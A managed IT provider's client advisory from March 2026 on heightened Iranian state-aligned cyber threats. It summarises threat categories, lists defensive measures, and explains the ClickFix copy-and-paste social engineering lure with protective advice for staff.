Announcements

Elevated Cyber Threat and Risk

Brian Zabeti
March 5, 2026
·
8 min read

This advisory is issued in response to current geopolitical developments and their potential cyber implications as a proactive measure.

Pliancy has already heightened monitoring across all managed systems, reviewed key controls, and engaged our security partners to ensure appropriate protections are in place.

What’s Happening

Following recent military actions involving Iran, Israel, and the United States, our security partners and vendors have assessed that Iranian state-aligned cyber activity is likely to intensify in the near term. Iran has a documented history of leveraging cyber operations alongside kinetic military action, including espionage campaigns, destructive malware, and coordinated disinformation.

Important context: As of this advisory, no significant malicious cyber activity has been directly attributed to these events. This is a proactive, precautionary notice.

Who May Be Affected

Organizations in the U.S. and allied nations, particularly those in financial services, life sciences, government, critical infrastructure, and media, are assessed as potential targets for direct or indirect cyber activity.

Cyber Threat Overview

Threat Category Key Tactics, Techniques & Procedures (TTPs) Potential Impact
Precision Espionage Spearphishing, credential harvesting, custom malware (APT34, APT42) Direct: financial services and life science clients are high-value targets
Destructive Attacks Wiper malware, DDoS, defacement via fake hacktivist personas Moderate: client-facing infrastructure exposure
Influence & Disinformation Fabricated leaks, social media manipulation, Telegram-based campaigns Low-Moderate: reputational risk to clients in public-facing sectors
Infrastructure Probing ICS/OT targeting, low-impact/high-visibility attacks on utilities Low: primarily affects organizations managing ICS/OT, but some life science environments with lab systems may be impacted

What We’re Doing

Pliancy is taking the following steps to strengthen your security posture:

  • Endpoint Protection: We’ve employed additional enhanced detection rules specifically aligned to Iranian threat actor tradecraft, including credential theft, PowerShell abuse, tunneling tools, and destructive malware techniques.
  • Identity Monitoring: We are validating that identity and access monitoring settings to ensure all accounts are properly protected by MFA and that no unexpected MFA bypass exists.
  • Threat Hunting: We initiated a proactive search and threat hunt across client environments to ensure no known indicators of compromise and known tactics are present.

A Note on Detection Sensitivity:
Due to the additional detection controls and rules we have enabled in response to the current threat environment, there is an increased chance of false positive alerts (legitimate activity flagged as suspicious). We are actively monitoring all managed environments and will tune rules as needed to minimize disruption while maintaining strong coverage. If you notice unexpected alerts or blocked activity, please let your Pliancy consultant or Outpost advisor know so we can investigate and adjust promptly.

Active Threat: ClickFix Social Engineering Technique

Building on this Iranian threat activity, we’ve also observed a recent uptick in true positive detections of the ClickFix technique across multiple client environments.

What is ClickFix? ClickFix is a social engineering attack disguised as a helpful prompt. You may encounter a fake error message, CAPTCHA, or “verification” pop-up on a website or in an email that instructs you to “fix” something by copying a command and pasting it into a Windows Run dialog (Win+R) or PowerShell. If followed, those instructions silently download and execute malware on your machine.

How to protect yourself:

  • Never copy and paste commands from a website, pop-up, or email into Run, PowerShell, Terminal, or Command Prompt
  • Legitimate websites and services will never ask you to do this. If a page tells you to press Win+R or open a terminal to “verify” yourself, close it immediately
  • Report it. If you see one of these prompts, take a screenshot and send it to your Pliancy consultant or Outpost advisor right away

While we are actively monitoring and responding to these detections, we ask that all clients and their teams stay extra vigilant for unusual prompts, pop-ups, or instructions that ask you to interact with system tools.

What We Recommend You Do

  1. Remind your team to stay alert for phishing. Expect an increase in socially engineered emails. If something looks suspicious, stop and report it immediately
  2. Verify MFA is enabled for all business-critical accounts, VPN access, and email
  3. Report any unusual activity to your Pliancy consultant or Outpost advisor promptly, including unexpected login prompts, password reset requests you did not initiate, or unfamiliar devices on your accounts
  4. Review your incident response plan and contacts. Make sure your team is familiar with the process and know who to call if something goes wrong

Our Commitment

We are closely monitoring this situation and will provide updates if the threat landscape changes materially. Your security posture is actively managed, and our detection and response capabilities are tuned for the current environment.  

Please contact your Pliancy consultant with questions or concerns.

If you would like to discuss security advisory services and incident response preparation, inform your consultant, and they will coordinate a discussion with our Outpost team to explore options.

Thank you for your continued partnership and trust.

Outpost Security by Pliancy

Navigation
ServicesDifferenceStatsProcessFAQContact
Legal
Trust CenterPrivacy PolicyCookie PolicyTerms & Conditions
Social
LinkedIn
© 2025 Pliancy Inc.
by pliancy